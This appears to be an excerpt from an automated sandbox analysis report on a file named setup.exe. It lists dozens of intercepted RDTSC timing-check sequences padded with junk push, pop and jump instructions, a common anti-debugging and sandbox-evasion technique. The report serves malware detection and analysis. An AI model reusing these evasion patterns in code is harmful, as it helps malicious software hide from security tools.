Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 585499 second address: 58549D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 585A2D second address: 585A3F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jng 00007FEA5C6FB9E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 585A3F second address: 585A4D instructions: 0x00000000 rdtsc 0x00000002 jc 00007FEA5CDC3A16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 585A4D second address: 585A59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FEA5C6FB9E6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53EEF3 second address: 53EEF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53EEF8 second address: 53EEFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 585D5C second address: 585D81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007FEA5CDC3A28h 0x0000000c pop esi 0x0000000d popad 0x0000000e push ecx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 585D81 second address: 585D87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 585EE8 second address: 585EFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5CDC3A1Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 585EFC second address: 585F02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 585F02 second address: 585F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5869B9 second address: 5869BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 58A1CE second address: 58A1D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 58A665 second address: 58A66B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 58A66B second address: 58A684 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA5CDC3A25h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 58A684 second address: 58A69E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FEA5C6FB9F2h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 58A69E second address: 58A6A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 58A6A2 second address: 58A6C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FEA5C6FB9F2h 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 58A6C1 second address: 58A6C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 58A6C7 second address: 58A6CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 58A6CC second address: 58A6E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA5CDC3A21h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 58A6E3 second address: 58A6E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 58E002 second address: 58E006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 58E006 second address: 58E00A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 58D751 second address: 58D755 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 58DA11 second address: 58DA19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 58DA19 second address: 58DA1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F54E3 second address: 4F54EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 59312B second address: 59315F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5CDC3A27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FEA5CDC3A26h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 59A731 second address: 59A77B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jo 00007FEA5C6FB9EAh 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push edi 0x00000012 jmp 00007FEA5C6FB9F7h 0x00000017 pop edi 0x00000018 popad 0x00000019 pushad 0x0000001a jmp 00007FEA5C6FB9F8h 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 push ecx 0x00000024 pop ecx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 598AAD second address: 598ABD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FEA5CDC3A1Ah 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 598D96 second address: 598D9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 598D9E second address: 598DAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 598DAA second address: 598DAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 599357 second address: 59935B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 59935B second address: 599388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA5C6FB9F0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FEA5C6FB9EDh 0x00000010 pop eax 0x00000011 pushad 0x00000012 push ebx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 599388 second address: 59938C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5998D6 second address: 5998FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5C6FB9F6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a js 00007FEA5C6FB9E6h 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5998FB second address: 59991B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007FEA5CDC3A1Fh 0x0000000d popad 0x0000000e jnp 00007FEA5CDC3A22h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 599C15 second address: 599C42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FEA5C6FB9E6h 0x0000000a popad 0x0000000b pushad 0x0000000c jo 00007FEA5C6FB9E6h 0x00000012 jmp 00007FEA5C6FB9F9h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 599C42 second address: 599C4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 59E753 second address: 59E759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 59D9EA second address: 59D9F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 59D9F0 second address: 59D9F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 59DE2E second address: 59DE34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 59DFAE second address: 59DFB8 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FEA5C6FB9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 59DFB8 second address: 59DFBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 59E2B7 second address: 59E2C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 59E2C0 second address: 59E2C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 59E2C4 second address: 59E2CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 59E473 second address: 59E479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 59E479 second address: 59E47D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 59E47D second address: 59E483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 59E483 second address: 59E48E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F8AE3 second address: 4F8AFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5CDC3A22h 0x00000007 jne 00007FEA5CDC3A16h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5AAB5F second address: 5AAB69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FEA5C6FB9E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5AAB69 second address: 5AAB6F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5AAB6F second address: 5AAB74 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5AAB74 second address: 5AAB96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jnl 00007FEA5CDC3A16h 0x00000013 popad 0x00000014 pushad 0x00000015 jmp 00007FEA5CDC3A1Bh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5AAE82 second address: 5AAE8F instructions: 0x00000000 rdtsc 0x00000002 je 00007FEA5C6FB9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5AAE8F second address: 5AAED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jbe 00007FEA5CDC3A35h 0x0000000b jns 00007FEA5CDC3A16h 0x00000011 jmp 00007FEA5CDC3A29h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FEA5CDC3A24h 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5AB20D second address: 5AB244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA5C6FB9EFh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jp 00007FEA5C6FBA0Dh 0x00000012 jnl 00007FEA5C6FB9F7h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5AB244 second address: 5AB24A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5AB3C8 second address: 5AB3DD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 js 00007FEA5C6FB9E6h 0x00000009 pop edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jns 00007FEA5C6FB9E6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5AC104 second address: 5AC112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push esi 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5AC7FC second address: 5AC832 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FEA5C6FB9E8h 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FEA5C6FB9F8h 0x00000010 pop eax 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pushad 0x00000017 popad 0x00000018 pop ecx 0x00000019 jo 00007FEA5C6FB9ECh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5AC832 second address: 5AC836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5AC836 second address: 5AC83E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5AFB52 second address: 5AFB72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FEA5CDC3A2Ah 0x0000000c jmp 00007FEA5CDC3A24h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5AFB72 second address: 5AFB7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FEA5C6FB9E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5AFB7C second address: 5AFB80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5AFB80 second address: 5AFBC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 jnl 00007FEA5C6FB9E6h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 jmp 00007FEA5C6FB9F0h 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FEA5C6FB9F7h 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5AFBC4 second address: 5AFBDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5CDC3A21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5B128E second address: 5B12A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 jl 00007FEA5C6FBA13h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5B12A0 second address: 5B12C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA5CDC3A27h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5B12C0 second address: 5B12C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5B49FB second address: 5B4A02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5B4B87 second address: 5B4B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5B4B8B second address: 5B4B91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5B4B91 second address: 5B4BAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 pushad 0x00000009 jp 00007FEA5C6FB9E6h 0x0000000f jp 00007FEA5C6FB9E6h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b pop eax 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5C5DF5 second address: 5C5E0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA5CDC3A26h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5C5E0F second address: 5C5E13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5C5E13 second address: 5C5E3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007FEA5CDC3A24h 0x00000012 popad 0x00000013 pop edx 0x00000014 pushad 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5C5E3A second address: 5C5E40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5C58DE second address: 5C58E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5C5A38 second address: 5C5A5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 jmp 00007FEA5C6FB9EBh 0x0000000b jmp 00007FEA5C6FB9EDh 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5C7BE9 second address: 5C7C03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007FEA5CDC3A25h 0x0000000b jmp 00007FEA5CDC3A1Fh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5C9664 second address: 5C9678 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jc 00007FEA5C6FB9E6h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007FEA5C6FB9E6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5C9678 second address: 5C967E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5C9522 second address: 5C9526 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5DEF7C second address: 5DEF81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5DEF81 second address: 5DEFB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007FEA5C6FB9F1h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jnc 00007FEA5C6FB9E6h 0x00000018 jmp 00007FEA5C6FB9F3h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5DEFB8 second address: 5DEFBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5DEFBC second address: 5DEFE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA5C6FB9F4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007FEA5C6FB9EAh 0x00000011 push eax 0x00000012 push edx 0x00000013 jnl 00007FEA5C6FB9E6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5DFA31 second address: 5DFA39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
